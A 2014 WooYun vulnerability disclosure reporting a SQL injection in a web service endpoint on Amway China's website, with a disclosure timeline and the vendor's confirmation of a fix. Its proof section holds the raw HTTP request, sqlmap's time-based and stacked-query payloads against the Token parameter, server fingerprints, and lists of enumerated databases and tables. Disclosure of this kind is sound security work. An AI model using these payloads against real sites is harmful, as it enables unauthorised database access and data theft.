当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-052388

漏洞标题:安利(中国)官网SQL注入

相关厂商:amway.com.cn

漏洞作者: m_vptr

提交时间:2014-03-07 16:19

修复时间:2014-04-21 16:20

公开时间:2014-04-21 16:20

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-07: 细节已通知厂商并且等待厂商处理中
2014-03-11: 厂商已经确认,细节仅向厂商公开
2014-03-21: 细节向核心白帽子及相关领域专家公开
2014-03-31: 细节向普通白帽子公开
2014-04-10: 细节向实习白帽子公开
2014-04-21: 细节向公众公开

简要描述:

SQL注入

详细说明:

WebService接口http://www.amway.com.cn/amwayplaza/AmwayServices.asmx?op=PvAddClick存在post型sql注入漏洞

POST /amwayplaza/AmwayServices.asmx/PvAddClick HTTP/1.1
Host: www.amway.com.cn
Proxy-Connection: keep-alive
Content-Length: 26
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.amway.com.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.amway.com.cn/amwayplaza/AmwayServices.asmx?op=PvAddClick
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: arp_scroll_position=0
Token=1&Title=2&Category=3

sqlmap identified the following injection points with a total of 94 HTTP(s) requests:
---
Place: POST
Parameter: Token
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Token=1'; WAITFOR DELAY '0:0:5'--&Title=2&Category=3
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Token=1' WAITFOR DELAY '0:0:5'--&Title=2&Category=3
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: Token
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Token=1'; WAITFOR DELAY '0:0:5'--&Title=2&Category=3
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Token=1' WAITFOR DELAY '0:0:5'--&Title=2&Category=3
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
available databases [16]:
[*] Amway
[*] amway_main
[*] AmwayProduct
[*] AmwaySearch
[*] dbIBOXMS_Amway
[*] dbIBOXMS_Main
[*] dbIBOXMS_Main_in
[*] IBOX_AmwayPlaza
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WebCrawl
[*] WebCrawlACTI

Database: Amway
[12 tables]
+------------------+
| FA_Product       |
| FA_Product_amway |
| FA_Product_aynex |
| dtproperties     |
| tbAdmin          |
| tbClick          |
| tbRoom           |
| tbRoomProduct    |
| tbVisit          |
| tbVisitReport    |
| tbqallary        |
| tbqallaryImg     |
+------------------+

非常耗时,没继续测了

修复方案:

你懂得

版权声明:转载请注明来源 m_vptr@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2014-03-11 11:50

厂商回复:

该漏洞已经确认,并修复,多谢白帽子提供。

最新状态:

2014-04-21:漏洞已經修復,多謝白帽子的支持